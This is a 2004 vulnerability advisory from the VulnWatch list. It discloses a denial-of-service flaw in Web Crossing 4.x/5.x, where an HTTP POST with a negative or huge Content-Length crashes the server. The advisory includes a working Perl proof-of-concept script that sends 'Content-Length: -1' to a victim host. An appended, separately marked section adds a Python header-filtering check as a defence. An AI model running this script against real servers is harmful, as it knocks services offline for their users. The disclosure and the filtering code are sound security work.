[VulnWatch] Web Crossing 4.x/5.x Denial of Service Vulnerability

From: Peter Winter-Smith (peter4020_at_hotmail.com)
Date: 02/03/04

    To: vulnwatch@vulnwatch.org
    Date: Tue, 03 Feb 2004 20:08:07 +0000
    
    

    Web Crossing 4.x/5.x Denial of Service Vulnerability

    ###################################################

    Credit:
    Author : Peter Winter-Smith

    Software:
    Package : Web Crossing
    Versions : 4.x/5.x
    Vendor : WebCrossing, Inc.
    Vendor Url : http://www.webcrossing.com/

    Vulnerability:
    Bug Type : Denial of Service
    Severity : Less Critical

    1. Description of Software

    "Web Crossing is the world's leading collaboration server platform,
    offering complete solutions including discussion groups/bulletin boards,
    integrated newsgroups and mailing lists, full email services, calendar
    services, real-time chats, live events and full web application
    programming features, complete cross-platform compatibility, and
    distributed/mirrored serving for ultimate scaleability."
    - Vendor's Description

    2. Bug Information

    (a). Denial of Service

    When an HTTP POST request is made to Web Crossing's built-in server
    application (default port 80/tcp), if the 'Content-Length' header supplied
    with the request is an extremely large or negative number, the server
    will encounter a set of instructions which lead to an integer-divide-by-
    zero problem, immediately crashing the server and denying any further
    service.

    The offending instruction is located at 0090121F:

    0090121F F7F9 IDIV ECX

    3. Proof of Concept

    The following Perl script should crash any Web Crossing BBS using the
    built-in server application for hosting:

    #########################################################################
    #!/usr/bin/perl -w
    #
    # Web Crossing 4.x\5.x Denial of Service Exploit
    # [ Bad 'Content-Length' Header Bug ]
    #
    # - by Peter Winter-Smith [peter4020@hotmail.com]

    use IO::Socket;

    if(!($ARGV[0]))
    {
        print "Usage: wxdos.pl <victim>\n";
        exit;
    }

    print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .
          "\t[ Bad 'Content-Length' Header Bug ]\n" .
          "\t[peter4020\@hotmail.com]\n\n";

    $victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
                                 PeerPort=>"80")
                                or die "Unable to connect to $ARGV[0] on " .
                                 "port 80";

    $DoS = "POST / HTTP/1.1\r\n" .
              "Content-Length: -1\r\n\r\n";

    print $victim $DoS;

    print "[+] Evil request made to target server ... Waiting...!\n";

    sleep(4);

    close($victim);

    print "[+] Done!\n";
    exit;
    #########################################################################

    4. Patches - Workarounds

    Although I was able to contact the Web Crossing support staff, when the
    investigation into this flaw was handed over to the development team all
    contact was lost with both them and the support staff and my emails were
    no longer answered. I have decided to release this information so that
    users of Web Crossing can decide what would be a suitable course of action
    for protecting their systems from this bug.

    No vendor-supplied patches exist; I would recommend that filtering of the
    'Content-Length' header is put into action via some third-party
    application if at all possible.

    5. Credits

    The discovery, analysis and exploitation of this flaw is a result of
    research carried out by Peter Winter-Smith. I would ask that you do not
    regard any of the analysis to be 'set in stone', and that if investigating
    this flaw you back trace the steps detailed earlier for yourself.

    Greets and thanks to:
    David and Mark Litchfield, JJ Gray (Nexus), Todd and all the
    packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),
    pv8man, nick k., Joel J. and Martine.

    o This document should be mirrored at
                       http://www.elitehaven.net/webxdos.txt
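
Added example, not part of the original advisory: one way to implement the 'Content-Length' filtering recommended in section 4, as a check a filtering proxy in front of the built-in server could run on each request's header block before forwarding it. The function name `check_content_length` and the `MAX_BODY_BYTES` cap are assumptions chosen for illustration.

```python
import re

# Assumed policy cap for request bodies; tune per application (not from the advisory).
MAX_BODY_BYTES = 10 * 1024 * 1024

_DIGITS = re.compile(rb"[0-9]+")


def check_content_length(raw_head: bytes, max_body: int = MAX_BODY_BYTES):
    """Return (allowed, reason) for the header block of one HTTP request.

    raw_head is everything up to and including the blank line.
    """
    head, sep, _ = raw_head.partition(b"\r\n\r\n")
    if not sep:
        return False, "incomplete header block"
    values = []
    for line in head.split(b"\r\n")[1:]:        # skip the request line
        name, colon, value = line.partition(b":")
        if not colon:
            return False, "malformed header line"
        if name.strip().lower() == b"content-length":
            values.append(value.strip())
    if not values:
        return True, "no Content-Length"
    if len(set(values)) > 1:
        return False, "conflicting Content-Length headers"
    value = values[0]
    # Digits only: rejects "-1", "+5", "0x10" and empty values.
    if not _DIGITS.fullmatch(value):
        return False, "Content-Length is not a non-negative decimal integer"
    # Compare digit count first so an oversized string is never converted.
    digits = value.lstrip(b"0") or b"0"
    if len(digits) > len(str(max_body)) or int(digits) > max_body:
        return False, "Content-Length exceeds configured limit"
    return True, "ok"


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "negative": b"POST / HTTP/1.1\r\nContent-Length: -1\r\n\r\n",
    "huge": b"POST / HTTP/1.1\r\nContent-Length: 99999999999999999999\r\n\r\n",
    "normal": b"POST / HTTP/1.1\r\nHost: bbs.example\r\nContent-Length: 42\r\n\r\n",
}

if __name__ == "__main__":
    for label, req in SAMPLES.items():
        print(label, check_content_length(req))
```

Requests that fail the check should be answered by the proxy itself (for example with a 400 response) and never passed to the backend.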
